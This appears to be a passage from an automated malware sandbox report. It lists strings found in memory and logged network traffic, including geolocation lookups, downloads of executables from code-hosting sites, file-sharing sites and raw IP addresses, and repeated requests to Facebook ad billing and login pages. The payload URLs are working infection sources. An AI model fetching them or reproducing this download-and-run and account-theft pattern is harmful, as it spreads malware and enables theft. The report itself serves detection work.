    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rcsc.lt/repository0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/cps/0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssc.lt/cps03
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/dpc0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/lcr0#
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.pinrules.crt/%sendTraceLogca1.3.6.1.4.1.311.10.8.11.3.6.1.4.1.311.10.11.1.3.6.1.4.1.311.1
    Source: rundll32.exe, 0000000C.00000003.439911292.00000156F14C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: A4A.exe, 00000012.00000003.393265091.0000000000879000.00000004.00000020.00020000.00000000.sdmp, A4A.exe, 00000012.00000002.622147226.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
    Source: A4A.exe, 0000000D.00000002.382455301.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, A4A.exe, 00000012.00000002.622147226.0000000000837000.00000004.00000020.00020000.00000000.sdmp, A4A.exe, 00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECAC.exe, 00000019.00000002.413944051.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, DC3D.exe, 0000001B.00000002.417250083.00000000022D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
    Source: A4A.exe, 00000012.00000002.622147226.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json4
    Source: A4A.exe, 00000012.00000003.393265091.0000000000879000.00000004.00000020.00020000.00000000.sdmp, A4A.exe, 00000012.00000002.622147226.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/u
    Source: rundll32.exe, 0000000C.00000003.439911292.00000156F14C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
    Source: rundll32.exe, 0000000C.00000002.575064363.00007DF449AE0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com
    Source: rundll32.exe, 0000000C.00000002.575064363.00007DF449AE0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com
    Source: rundll32.exe, 0000000C.00000003.439911292.00000156F14C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: rundll32.exe, 0000000C.00000003.439911292.00000156F14C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: rundll32.exe, 0000000C.00000003.439911292.00000156F14C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eca.hinet.net/repository0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://repository.luxtrust.lu0
    Source: rundll32.exe, 0000000C.00000003.439911292.00000156F14C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
    Source: rundll32.exe, 0000000C.00000003.439911292.00000156F14C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
    Source: rundll32.exe, 0000000C.00000003.439911292.00000156F14C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
    Source: rundll32.exe, 0000000C.00000003.439911292.00000156F14C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.certicamara.com/marco-legal0Z
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ACTAS/789230
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/address/)1(0&
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
    Source: rundll32.exe, 0000000C.00000003.439911292.00000156F14C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.hu/docs/
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.net/docs
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
    Source: unknownDNS traffic detected: queries for: potunulit.org
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B24D7C WSARecv,12_2_00007DF449B24D7C
    Source: global trafficHTTP traffic detected: GET /systems/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: autoacores.com
    Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
    Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
    Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
    Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
    Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
    Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
    Source: global trafficHTTP traffic detected: GET /systems/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: beg.com.ve
    Source: global trafficHTTP traffic detected: GET /evgenfaraday/mytoy/raw/main/5454543.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
    Source: global trafficHTTP traffic detected: GET /hpINT HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: shorturl.at
    Source: global trafficHTTP traffic detected: GET /hpINT HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.shorturl.at
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.shorturl.at
    Source: global trafficHTTP traffic detected: GET /3RaZ238 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bit.ly
    Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
    Source: global trafficHTTP traffic detected: GET /tollandrew/aboba/downloads/yaplakalkogdavieli.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitbucket.org
    Source: global trafficHTTP traffic detected: GET /%23/ HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ads-optimization-of-meta.web.app
    Source: global trafficHTTP traffic detected: GET /kdrbr1W2y7/916c52d4-1675638446/Xzswnwa.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn-153.hotfile.io
    Source: global trafficHTTP traffic detected: GET /kdrbr1W2y7 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: hotfile.io
    Source: global trafficHTTP traffic detected: GET /preterka/PreterHello/raw/main/QueenPars.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
    Source: global trafficHTTP traffic detected: GET /get/yVhGA8/app.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
    Source: global trafficHTTP traffic detected: GET /Japoi111/azazazd/blob/main/t5mu6zi.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
    Source: global trafficHTTP traffic detected: GET /5XqFyc/brazilx86.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
    Source: global trafficHTTP traffic detected: GET /media/smartbot.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: smartbot.dev
    Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
    Source: global trafficHTTP traffic detected: GET /2701.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: xv.yxzgamen.com
    Source: global trafficHTTP traffic detected: GET /logo.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: xv.yxzgamen.com
    Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
    Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
    Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
    Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
    Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
    Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
    Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
    Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
    Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
    Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
    Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
    Source: global trafficHTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: uaery.top
    Source: global trafficHTTP traffic detected: GET /llpb1133.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.74.80
    Source: global trafficHTTP traffic detected: GET /s.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 80.85.241.98
    Source: global trafficHTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: uaery.top
    Source: global trafficHTTP traffic detected: GET /totti.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.106.124.133
    Source: global trafficHTTP traffic detected: GET /totti.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.106.124.133
    Source: global trafficHTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: uaery.top
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
